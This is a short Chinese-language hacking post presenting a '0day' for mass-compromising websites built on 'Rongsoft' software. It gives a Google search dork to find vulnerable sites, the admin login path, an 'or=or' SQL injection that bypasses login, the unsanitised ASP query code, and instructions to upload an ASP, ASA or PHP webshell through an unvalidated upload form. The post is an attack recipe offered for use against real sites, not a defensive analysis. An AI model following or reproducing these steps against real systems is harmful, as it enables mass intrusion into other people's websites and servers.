Rongsoft Oday 批量拿SHELL

再GOOGLE里搜索关键字：inurl:xinwenxq.asp?biaohao=

访问管理地址：gonggong/denglu/denglu.asp


首先在 管理登陆页面，用简单的or=or可以欺骗过去！

在验证文件里：


zhanghao=request("zhanghao")
mima=request("mima")
quanxian=1
session.timeout=230

Set rs= Server.CreateObject("ADODB.Recordset")
sql="select zhanghao,quanxian from guanli where zhanghao="&zhanghao&" and mima="&mima&" and zhuangtai=1"
rs.open sql,conn,1,1


真怀疑 这程序的作者是不是白痴，没有任何防注入的措施！

进入后台后，上传WEBSELL更是让人大吃一惊！
 

随便选择一个版块，添加

 

点击上传，然后直接传木马了。ASP ASA PHP都可以

看了后台的上传代码，发现程序只负责上传，根本没对任何文件验证

好了